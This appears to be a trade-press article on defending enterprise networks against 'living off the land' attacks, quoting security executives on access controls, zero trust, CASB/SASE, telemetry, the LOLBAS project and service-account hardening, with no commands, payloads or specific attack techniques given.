Securing The Network Against Living Off the Land Attacks
As adversaries increasingly turn to legitimate tools and tactics to carry out their malicious activities, enterprises must adapt and enhance their network security measures to effectively detect and defend against these attacks. Known as “living off the land” (LotL), these tactics involve hackers using native, legitimate tools within an organization’s environment to avoid detection and carry out their attacks. By utilizing existing tools rather than introducing new ones, attackers make it difficult for defenders to differentiate between malicious actions and legitimate activity, thus evading detection.
To combat this threat, IT security leaders must rethink their network architecture to make it more challenging for attackers to move within the network. Implementing strong access controls, monitoring privileged behavior analytics, and adopting a zero-trust framework with strict privileged access controls can hinder attackers’ ability to navigate the network undetected. By forcing attackers to create more noise on the network, defenders have a better chance of spotting unauthorized access and suspicious activity early in the attack process, before malicious software or ransomware can be deployed.
In addition to access controls, organizations can consider implementing cloud access security broker (CASB) and secure access service edge (SASE) technologies to gain visibility into network connections and activities. CASB solutions act as intermediaries between end users and cloud service providers, offering security controls like data loss prevention, access control, encryption, and threat detection. SASE combines network security functions with wide area network capabilities, providing comprehensive security coverage for organizations adopting cloud services and applications.
Gareth Lindahl-Wise, CISO at Ontinue, emphasizes the importance of managing the attack surface created by living off the land techniques. With the behavioral anomalies inherent in these tactics, it is crucial for security teams to monitor and analyze network traffic, access requests, and endpoint activities. By enriching telemetry data with network connectivity information and leveraging network traffic inspection, teams can uncover malicious activities and potential security threats, even in encrypted traffic.
Taking an evidence-based approach, organizations can prioritize telemetry sources that provide visibility into legitimate utility abuse. By focusing on telemetry sources that align with common LotL techniques observed in the wild, security teams can optimize their monitoring efforts and enhance their ability to detect and respond to threats. Scott Small, director of threat intelligence at Tidal Cyber, highlights community efforts like the LOLBAS project, which tracks potentially malicious applications of key utilities, as valuable resources for organizations seeking to bolster their security posture.
Randy Pargman, director of threat detection at Proofpoint, emphasizes the importance of leveraging endpoint events and custom detection queries to detect living off the land attacks. By monitoring endpoint events and identifying abnormal patterns of use, security teams can uncover suspicious activities and potential security breaches. Pargman also recommends limiting the abuse of built-in tools favored by attackers and strengthening authentication mechanisms for service accounts to mitigate the risk of LotL attacks.
Rob Hughes, CIO of RSA, underscores the need to reduce reliance on credentials and establish robust identity controls to prevent living off the land attacks. By investing in strong authentication mechanisms, monitoring interactive logins from service accounts, and maintaining an inventory of service accounts, organizations can enhance their security posture and mitigate the risk of unauthorized access and data breaches.
Building a culture of security requires a time investment and commitment from organizational leadership. While enhancing identity controls and network security measures may require initial effort and resources, the long-term benefits of reducing security risks and protecting sensitive data outweigh the costs. By prioritizing security initiatives and investing in technical debt reduction, organizations can strengthen their defenses against evolving cyber threats and safeguard their digital assets.